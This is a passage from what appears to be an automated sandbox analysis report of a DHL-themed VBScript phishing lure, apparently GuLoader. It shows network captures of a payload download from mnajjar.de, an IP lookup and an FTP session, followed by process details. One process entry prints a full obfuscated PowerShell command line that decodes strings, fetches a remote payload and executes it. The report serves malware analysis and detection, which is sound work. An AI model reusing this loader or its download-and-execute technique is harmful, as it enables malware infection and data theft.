                                              Data Ascii: WlrdDMPO2DE1e0L4LhxXrQ8sOJSN4m+8hM4vsCx6PZxlWE32ah54phRWgcKfdt9SOzve8bHbYVGXPxz+kgbqNxrVKz7f/F02oF1J9Bvr0aBDGJFOFsSXEvnO2DGWl05X/3vIrshhbkfE/Yuf684eUhyQHJSUM3hyRs4u/Wf665SULma3ShhwnJlG+4hHjZYWwQCqnOyNrAiEFPs3aNky0Nv/IcHo0ElqoXFC+khaL9z+e/LIHHJ
                                              Apr 23, 2024 08:03:51.057887077 CEST1289INData Raw: 4b 2b 35 51 69 79 46 39 6b 76 31 4f 31 69 51 37 64 38 62 46 59 55 70 37 65 43 73 6f 70 46 36 68 6c 4d 67 78 72 51 51 6a 55 41 72 4a 48 35 50 37 42 56 2b 54 2b 77 56 66 6b 2f 73 46 58 35 50 37 42 56 2b 67 49 56 7a 44 64 38 6f 6f 46 5a 33 70 78 69
                                              Data Ascii: K+5QiyF9kv1O1iQ7d8bFYUp7eCsopF6hlMgxrQQjUArJH5P7BV+T+wVfk/sFX5P7BV+gIVzDd8ooFZ3pxiNloH83bVnYz7Y6tbx8R+G9XEuWLkM4Bd+T+zZ5R1AXpcB59oGwyOL1eScFRl9kEWSkrytuUgVt1Oaz4uXeuKyOH7Z6TtTZEfixg4cfNJoxw9qishSNXPgI9AZ4aw0eO5ydd7O94EwJGAo6KpHJ6w9paGYMaontZc1


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449738148.163.99.20807856C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 23, 2024 08:04:45.816677094 CEST176OUTGET /vsp/izoOgnnlVO233.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: mnajjar.de
                                              Cache-Control: no-cache
                                              Apr 23, 2024 08:04:45.964473963 CEST1289INHTTP/1.1 200 OK
                                              Connection: Keep-Alive
                                              Keep-Alive: timeout=5, max=100
                                              content-type: application/octet-stream
                                              last-modified: Mon, 22 Apr 2024 02:35:09 GMT
                                              accept-ranges: bytes
                                              content-length: 241728
                                              date: Tue, 23 Apr 2024 06:04:45 GMT
                                              Data Raw: 3f e3 eb 3a 59 af 1f aa ff ef 7a f9 45 54 6c 23 17 c1 ca 40 a4 74 de 7e c4 f3 31 d7 c9 d9 f1 62 00 56 14 91 75 76 c1 a3 de 61 0d 26 61 16 ce db 80 18 d3 25 30 a8 7e 60 0a 45 f9 be 85 55 a8 84 cb 06 2b 72 b5 d1 9a ff 68 0c 9d d7 99 bd c7 c9 43 cd 10 94 d6 e6 97 07 b0 bc 19 67 08 4a 7f c4 2f 37 1f 4c 34 1c 89 f9 0a a9 81 30 93 c5 ba d8 18 f2 de 87 06 41 7d 5b ed 7b fa 95 e7 c1 09 34 56 be a4 9e 62 e5 21 b9 c7 c0 98 5b fa ca ba 40 23 25 05 0c e7 12 53 2c f4 55 21 f9 b8 19 fc 3b 3f d4 43 fb b7 4c d0 d1 99 80 6f 3b bc 4b 28 34 25 7d fb 4e 28 f7 c0 4c 25 83 57 c3 a5 8f e8 d5 a5 ac dc 71 39 49 e0 25 d5 20 21 43 bf 6a 23 3f 71 62 de 21 f3 1d 6f 75 4e 70 8f 25 b6 d2 94 2c b1 2b ac 06 8d fc 90 9b 14 04 34 a2 f3 3a 9d f0 e6 c7 ea 9c 4a 58 ef c2 fc b7 b8 52 d9 aa f6 57 fa 5b 62 09 b5 8f 62 fc b2 14 cf 5f 3b 64 25 81 53 be 30 07 b8 50 95 98 a8 85 f2 60 78 f6 4a 69 70 30 b4 0b 81 d0 d6 65 7f 67 fa 41 4b 40 11 9d 62 80 25 0c c5 73 53 10 99 50 b9 3b 0d aa a0 9d 60 66 60 5b 50 af 18 3c b5 0d 95 aa a5 0e 5d 46 2b d6 89 4f 1d a0 8e c2 0f 64 3c 02 a7 53 8f 8a e4 52 a6 e9 25 a8 f0 06 43 d1 37 37 2c 7e 5b 8f c3 b6 84 e1 70 63 f1 db f7 66 aa 39 90 54 c5 e6 04 78 2d 2e aa 61 de c6 d4 b7 a1 4d e6 e5 15 64 b7 39 26 64 bc 3b d2 1d 88 d9 ca 08 67 d1 c5 16 3d 73 29 20 db 16 a9 fc db 99 18 73 28 65 a6 ba 95 b9 5e 17 63 2c c9 ef 1f cf 96 c0 96 8c ec ea 5f 8b 04 53 2b 77 67 6e 95 f9 66 62 60 e3 20 9a 81 de b0 cd 25 b9 dd 8c 33 f0 d4 aa 6b b7 ed d6 33 19 f1 09 78 62 4b e0 56 32 a4 c1 77 c5 90 26 d8 88 68 a5 76 1c cb 39 3e ac 58 66 47 ed ac 90 5e f4 9b 93 7f 84 a9 a1 8c 6e b0 57 ec 98 a4 4f bf d0 cd a7 33 c1 b8 66 33 6a 10 11 b8 be 0c 70 b1 8a 0d 09 a9 16 b7 f3 4a 62 68 50 9e cc 6a 86 1b 17 ab f1 b2 66 4b d2 ea cf a8 aa 84 60 bd 36 27 c7 d1 c4 4d a7 41 d3 6b f4 2f 39 89 e2 f9 66 73 52 53 d7 01 c6 64 b2 c7 b8 b5 0a 1d 80 fa 04 8c 2e 5c ce f4 4d d3 1c 9b ce c9 e8 54 4e 71 be ae 31 85 85 97 c5 16 e9 38 ce 8c 25 a8 80 54 e7 6e 13 d3 ac 8d f5 d8 ff 19 bd 1b d6 c0 c7 18 bd bf 53 6c b2 38 38 98 cc cd d7 8e 7f 9f 2a c4 40 a1 53 dd 1e 68 ad 4b 9e 6c 1e 89 5e a7 e9 a4 6e 1f b9 d4 46 69 e5 90 97 61 3b 4a b1 52 34 51 83 ec a1 9e 51 a9 11 ac f4 f4 ac ce d3 b5 69 10 d2 e9 6c 14 4f 65 75 de f6 44 69 f0 0e 5d d8 88 e2 b6 64 52 bb 55 99 89 b8 40 29 11 63 1a 75 ac 48 00 4d 4f 62 10 b0 f4 7f 31 c5 b4 8b 32 2f fc f0 d6 a6 49 1e e0 11 3f 61 49 d4 52 76 2f b5 8a 77 8a a0 74 6a fe 46 76 99 db dd 49 b4 48 bc 45 f5 c6 97 42 3b 04 76 f2 9a 54 ab 07 a6 9e d3 3e 75 23 22 04 af f4 c8 c3 a0 fd c7 a5 f8 be 84 e3 cd 68 66 a5 c2 b4 b7 ee 95 30 03 e7 2e ed 99 e0 dd 89 08 87 eb 5c 83 e2 36 95 c0 ba 8b 8d eb cd 27 67 f2 0e fe 4a 0f 45 92 00 29 27 fe 0e cb af c7 25 e4 c2 d2 d3 24 01 fd 76 99 d9 81 0f 0f bc 59 44 8f e5 de 06 ea b4 1b 3b 23 fa c1 98 36 2f e4 f1 a6 ff fe 8c 07 be e9 42 d2 fe 0f d5 be 94 00 f5 8a 85 0e 29 46 5e 9c ec b1 db 2d 84 88 fa cd cc 67 50 6b 09 44 7a f6 fa 45 04 43 b0 db a3 50 11 3a 86 ed b1 a9 0e 2a a7 a9 0c de e5 90 ed 1e bc 76 cd f8 59 86 48 2c 73 87 1d f2 c0 a2 7f 3d 91 66 7f 45 3f ba 7a 5b cd d4 ba 2e ae 04 96 8d 16 ec c7 48 22 f3 1c f2 14 a7 e3 14 c3 2e b0 a3 4a 64 6d 6b 14 51 32 5c a4 2e cb 30 f7 ff 04 bb 4d 6d 1d 67 b8
                                              Data Ascii: ?:YzETl#@t~1bVuva&a%0~`EU+rhCgJ/7L40A}[{4Vb![@#%S,U!;?CLo;K(4%}N(L%Wq9I% !Cj#?qb!ouNp%,+4:JXRW[bb_;d%S0P`xJip0egAK@b%sSP;`f`[P<]F+Od<SR%C77,~[pcf9Tx-.aMd9&d;g=s) s(e^c,_S+wgnfb` %3k3xbKV2w&hv9>XfG^nWO3f3jpJbhPjfK`6'MAk/9fsRSd.\MTNq18%TnSl88*@ShKl^nFia;JR4QQilOeuDi]dRU@)cuHMOb12/I?aIRv/wtjFvIHEB;vT>u#"hf0.\6'gJE)'%$vYD;#6/B)F^-gPkDzECP:*vYH,s=fE?z[.H".JdmkQ2\.0Mmg
                                              Apr 23, 2024 08:04:45.964514017 CEST1289INData Raw: 70 1a 71 9c cf be b7 d4 8f be bc 0e 00 9f b8 11 46 68 cf e2 6b 3a 1b 37 98 7a 29 f7 13 6d 22 f1 b5 6a a4 aa 23 d0 5b 88 90 78 8e 4e 4e 4d fc b5 7c 4a 65 3e c7 4f 4a 68 15 65 84 45 a4 5a de 20 74 b2 c7 28 80 f8 21 3c f8 58 4d 77 e9 66 32 89 f9 6c
                                              Data Ascii: pqFhk:7z)m"j#[xNNM|Je>OJheEZ t(!<XMwf2lyYw&-Vm-#Tt4G!5I9/~`ww[JlvM^|U,\XlfC3(Mgj+7@Z8kmM pdFwby6*1,%|W\
                                              Apr 23, 2024 08:04:45.964551926 CEST1289INData Raw: fd c6 bb 72 b2 fb b8 fd 6f 71 07 d7 66 46 ed 83 f9 e5 03 94 d6 ec 95 75 19 9f 19 17 20 bd 7f c4 29 1d 01 4e 4f 87 89 f9 0e 83 a3 32 90 b8 21 d8 18 f6 f4 cd 04 69 6e 5b ed 71 f8 e7 64 e9 09 44 70 5d 1e 90 64 7b 36 76 9d e4 99 17 33 c1 cc 2a 49 2b
                                              Data Ascii: roqfFu )NO2!in[qdDp]d{6v3*I+|y}&N!>{L8)PF}cU@7%@==!7OvF%pf71PiW_HCq-H%{5x%`~(sM/}OAKZ%
                                              Apr 23, 2024 08:04:45.964591026 CEST1289INData Raw: 97 25 b6 7e 95 2f 99 c1 ad 06 8b fe 94 b3 8e c0 37 a4 f1 1f b5 16 e7 27 ef 9e 44 5c 87 2a fd 97 be 50 d7 ad de bd ff 5b 64 0b bb 89 4a 10 b7 14 c9 75 25 66 5e 69 53 9e 30 2d 9a 50 96 e5 40 85 f2 64 50 e8 08 97 99 30 a4 0f ab e2 d4 66 02 8e ea 41
                                              Data Ascii: %~/7'D\*P[dJu%f^iS0-P@dP0fAOzj%Yq-S;F[2AYl5-f?KSLi54Q[sb=RG,3n6'd9`E>%q)&e0Sbeva,2Tx}yldbd
                                              Apr 23, 2024 08:04:45.964626074 CEST1289INData Raw: 70 43 f0 db f7 66 54 37 90 54 c5 18 08 78 2d 0e a0 61 de c6 2a b6 98 48 e6 e5 15 5c b2 39 26 64 84 ae 2c e2 77 d3 ca 08 7c e1 c3 16 cd 73 29 20 d9 16 a9 ed f3 b9 18 73 60 9b a8 b8 95 81 82 17 63 2c c9 11 3d b9 f3 98 e3 8c ec ea 25 2f 3e c9 2b 57
                                              Data Ascii: pCfT7Tx-a*H\9&d,w|s) s`c,=%/>+Wg_et %43*Kk{bK7&iv<>\N,OwoAfC/s!liP kiN\T`C?ASV5~K[e~.M
                                              Apr 23, 2024 08:04:45.964660883 CEST1289INData Raw: d4 ed 4d dc c9 a7 13 c0 bc 66 33 16 15 11 b8 14 7d 79 b1 8a 7d 7b a4 16 b7 83 25 77 68 50 d4 6e 94 c8 1f 17 8b f3 b2 66 4b a0 fb cf a8 da 26 9e b1 32 47 22 d1 c4 4d a7 69 c5 23 f4 25 c7 85 e7 fc 98 46 c4 51 a5 f8 f7 65 c2 ec af b5 0a 16 22 04 0e
                                              Data Ascii: Mf3}y}{%whPnfK&2G"Mi#%FQe".|Mn}>8TI0":F]-lo'^T:M}hX\VqxGjV4)?9?mv|Sk3MH'\?NoGM&XUh
                                              Apr 23, 2024 08:04:45.964696884 CEST1289INData Raw: dc 67 99 1d ab a8 91 84 64 ad 58 5d 23 9a 85 56 ef c5 62 5a 74 41 77 0d a5 a1 42 76 a1 b1 32 03 5f 09 37 1b 1f 1c 2f d4 ef 15 15 53 fe ae 71 56 76 09 fb 7f ad b1 e2 8d 99 6b 33 b3 44 16 06 c4 fa 14 30 17 28 69 18 4e 1e 44 15 d4 9b 19 8a b3 b0 a8
                                              Data Ascii: gdX]#VbZtAwBv2_7/SqVvk3D0(iND[UHjrW @dD2,1>_:[:x8gJZO#,\tt&(#.18E)'`oSJbN`|X9 vc
                                              Apr 23, 2024 08:04:45.964732885 CEST1289INData Raw: d1 97 1f 07 15 58 4e 03 19 2f b0 9c e0 dd fb 30 82 eb 3d 83 da ac 2e 3f 45 75 ee eb cd 0d 09 f2 0e ed 04 0c 45 d0 7f 29 27 f9 48 cb be e7 65 e4 c2 d2 1a 2a 00 fd 6b bc d8 81 62 0f 42 55 61 8f c5 d8 78 ea b4 e5 b9 67 ed ce 16 85 39 81 82 09 20 fa
                                              Data Ascii: XN/0=.?EuE)'He*kbBUaxg9 O2{5c7TnV/68[nJloO`bg&C|{L/D&[mn{@~XePF{`eVt'Jdj-F\P0_mn8p8QO*@lxbZ]G
                                              Apr 23, 2024 08:04:45.964770079 CEST1289INData Raw: 32 5b 8b 09 93 62 7b be 3c 84 70 58 c1 e9 8c 16 55 fd 42 8c f3 ca 46 8c e5 7b cb 60 65 fa 56 fe 90 74 3f df 4a 64 93 6a 2d 74 cd 5c a4 50 c7 34 f7 af 8e bb b2 6f 35 24 38 70 90 59 58 4f be bd 71 05 41 bc 8c fe 6e be 91 e6 f3 cf b7 05 a5 77 57 fd
                                              Data Ascii: 2[b{<pXUBF{`eVt?Jdj-t\P4o5$8pYXOqAnwWZ?g1X0%5|JoMImcEV>vd$ms'gU({E& t>]XYUG=F|X`}y2)ejr$eV~VE|l)hNB^/J
                                              Apr 23, 2024 08:04:45.964806080 CEST1289INData Raw: c4 b3 74 54 05 8e 10 d9 b7 5f 9e 45 35 8f 46 76 c7 d3 a1 d3 57 88 1c 60 83 c9 4d 6c ea 28 92 a1 80 04 64 ae b4 b6 1d b6 f2 1b 7e a3 f4 91 bf 99 f7 4d a4 57 c4 99 56 51 81 be 63 bb 72 b6 f1 91 ff 6c 0c 63 d9 6a 42 c7 37 f7 c1 10 b4 d6 e6 97 07 0e
                                              Data Ascii: tT_E5FvW`Ml(d~MWVQcrlcjB7 mJ6L4<yxx[{gX[o](tx'5(JV$|l^8dwlz!q+GW=qUI%h[7j#?Ig!%tBO*j,'JI
                                              Apr 23, 2024 08:04:46.112468004 CEST1289INData Raw: f6 21 9e 97 c0 a4 86 a8 e9 01 1b 06 08 7b 14 b6 1c 9e 2b 26 f9 cd 46 01 7d 59 c0 a5 8f 16 d9 f6 e9 fc 72 75 48 e3 db 69 9c 29 25 bf 6a dd 33 70 62 20 28 12 1d 45 65 45 71 8e 51 a5 74 97 2e 4f 2d ae 06 ad f8 90 9b 6a 3f 39 a1 f3 1a 63 fc e5 27 c9
                                              Data Ascii: !{+&F}YruHi)%j3pb (EeEqQt.O-j?9c'JX<Rw[bKa\;D#SW`z2[!vOdXJPb4,sSg^;5DW8=T2KF+wFd8SRC/;4,^XzI|8Pz.kD9&d


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449739104.26.12.2054437856C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-23 06:04:47 UTC155OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                              Host: api.ipify.org
                                              Connection: Keep-Alive
                                              2024-04-23 06:04:47 UTC211INHTTP/1.1 200 OK
                                              Date: Tue, 23 Apr 2024 06:04:47 GMT
                                              Content-Type: text/plain
                                              Content-Length: 14
                                              Connection: close
                                              Vary: Origin
                                              CF-Cache-Status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 878ba87ba9080ca9-EWR
                                              2024-04-23 06:04:47 UTC14INData Raw: 31 35 34 2e 31 36 2e 31 39 32 2e 31 36 33
                                              Data Ascii: 154.16.192.163


                                              FTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Apr 23, 2024 08:04:48.989525080 CEST2149740192.185.13.234192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 01:04. Server port: 21.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 01:04. Server port: 21.220-IPv6 connections are also welcome on this server.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 01:04. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                              Apr 23, 2024 08:04:48.990019083 CEST2149740192.185.13.234192.168.2.4220 Logout.

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:08:03:44
                                              Start date:23/04/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs"
                                              Imagebase:0x7ff7cbdb0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:08:03:45
                                              Start date:23/04/2024
                                              Path:C:\Windows\System32\PING.EXE
                                              Wow64 process (32bit):false
                                              Commandline:ping google.com -n 1
                                              Imagebase:0x7ff6684b0000
                                              File size:22'528 bytes
                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:08:03:45
                                              Start date:23/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:08:03:45
                                              Start date:23/04/2024
                                              Path:C:\Windows\System32\PING.EXE
                                              Wow64 process (32bit):false
                                              Commandline:ping %.%.%.%
                                              Imagebase:0x7ff6684b0000
                                              File size:22'528 bytes
                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:08:03:45
                                              Start date:23/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:08:03:45
                                              Start date:23/04/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /c dir
                                              Imagebase:0x7ff63d840000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:08:03:45
                                              Start date:23/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:08:03:46
                                              Start date:23/04/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSt.lavulselrsvippkKoder. KyllDOpry o F,brw evisnStemmlEvapooCenteaJob udobfusFBohavi Melkl amseepunkt(Su.pr$ UsliFFremmo ortrJagttuI depnViderdAnensebathon OphodPreapeBaddesParti7Ra,df9Caust,Un.us$va teUSkrppdDe aif Del aKvat.k Skllt nor uWh,lar Svine.aporrTectoeAngaksSttt.) agis ';$Prostatectomy=$Femogtyvende[1]+$Prostatectomy;$Udfaktureres=$Femogtyvende[0];Halvkusinen (Posthoc168 'For,t$SodavgSincelHealdoM.rmebB arbaDevoclTrans:ExitiPCurieaRrpospModvipbagtaeL.courDiasts Mome=Glets( Ma,oT ,iree,uculs .epitMikro-Ve.zePBelloaAnamnt stroh P.ly Bur $ForstUBevged Abjuf P.shaMam.lkStepptHastiuPolicr Bl,deKvabtr IkoneT,ykssDelpr)Bulim ');while (!$Pappers) {Halvkusinen (Posthoc168 'Explo$U,congRecomlResheoForpabWitheaWakfblShaik:FniseASlutsdDr,err StaviKo.fraSyfiltGr sei Mcnac St,i=Vexat$Bowlit .utcrnjereuA,steeRefor ') ;Halvkusinen $Prostatectomy;Halvkusinen (Posthoc168 ' OutpShjisotTrineaPrionrTranstxanth-StearSFootllOplage.ubcoeYd,evpWorl R neb4Autom ');Halvkusinen (Posthoc168 'Yuruc$NonchgKar elGjaldo yvabskaglaBil.ylMatte:SphegP spanaUddykpInfr,pnegate t,nkrFeriesB.nkr=Koffa(MolteTBa,kaeUnsp.sMinuttGryl -AdsorPSubtia enlt JagthMurst Vands$SolbaUoctard,oilefRotatablnddkFigent,accau MisarIberie edurStoreeLiv.fsUnplu)Yorks ') ;Halvkusinen (Posthoc168 'Petey$ G,nngSknsalT,llgo Lewdb ForeaeraselTag i:Ga.glCOveraoMul,iiFo fasMisdat in ir Jug.eSkppelGaransmedic=Undis$MarmigOvermlFlankoForudb mus,a.eserlChief:RefleS.egynkFllesrdsiockForhaiFede.n Nonpd KrsejKl jna Bu.sgG.rmae OpernSkenddNimsheButik+Salth+ ragt%Aroma$BeretTAalbor LinieInt.rdJuleseLambelGla,etI,dekeOriensOrang2Tense0 Tyro.BevikcTelefoKurveuCo,pun ReprtUbeha ') ;$Forundendes79=$Tredeltes20[$Coistrels];}Halvkusinen (Posthoc168 'Tim.r$ ErhvgFaarelWepmaoSpo.ibdamp.aVand lParag:.nchhE.ndesgTa.leo perstSmaadrRevoliAfskepTrumfpBea ueBadedrUndernFor beT emi7 Ta t4Stric ,verv=insou Frs,G SmrbeDamprtLa.kn-underC,isiooSmeltn Verst AceteSculpnSjleat d,ct Tilsy$M.nsuUCoel.d depofEscudaSaddlkKa yotRituauFrostr IndeeCykelrMofuseOplyssGeote ');Halvkusinen (Posthoc168 'N.nag$ExpelgDriftlBejaboEnajibHelteaHovedl Spec:OvertU KbesnBagdel,illiaGingeb Trucoe rovrDef.naPostibAb eslEkstre P.el B.ann= Chel Rusf[Ulv,mSSelskyKngtesAlbantPynteeSivebm Egot.FraseCS midoColomnSybilvOmraaeGonorrHochet Int ]Spytk:Humor:Evoc.F egimr.astroBesvrmKasseBenkelaSkaktsNordieLgg,r6Tu,en4BortfSOpalitMesmer langi DilanThromgFolke( Thym$Om,ryENoneqg Te.eoSyn,etUngerrBrakeiMastopAsbespBttefeArbejrAlbugnBouileRhy,o7 Mote4Sp,ba) Traa ');Halvkusinen (Posthoc168 ' Tilb$Mi,jbgMartelDustpoBekenb,peraaMeratlRiffe:P enoGOuthueRegnmmLika,iTitantNonreoGobblrCykeliKvderaFo,holOr.er St,er=Lnmo. Udrug[ ManaSCoalsyA iensp.cistSpinne KravmVestl.Souh TGldsbeScallxDarkitYpper. plauEGennenEftercHyp.koInferdSpi eiStrygnVade.gAnne.]Candi: Lovf: MiniA LyslSSkjolC ,orsIEjakuI Arch.SuperGMorkieDagvrtCruceS.igortSuperr S,eri oastnLootegAnker(It.ne$C angU onflnKashal UnglaTilsab MaaloUdnvnrGuan,aHemlobSolvelSakseeOleog)Blikv ');Halvkusinen (Posthoc168 'Anlac$EkspogConfilGat woBladsbFrdigaTandhlK.ltu:T,dstTD,flur .ropsdeba.kRimesoSpintm Reala .medgEnsafeCh.derBor le El cnOv.rd=Ora.g$CaeciG PseueKan,nmevaneiPreext BadgoThaierSpgeniKultuaOctavlOmlss.,rodusStjgeu ,eribTogl,s Udbytdukk r,depuiBaandnPyromgEuroe(unbeh3 Mont0Vacci3M,deb4Blond2Nesto3 Sneg, unde2Cliff9.stro4Recep2Unsto8 L ve).amme ');Halvkusinen $Trskomageren;"
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.2604034817.000001B6D16B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:08:03:46
                                              Start date:23/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
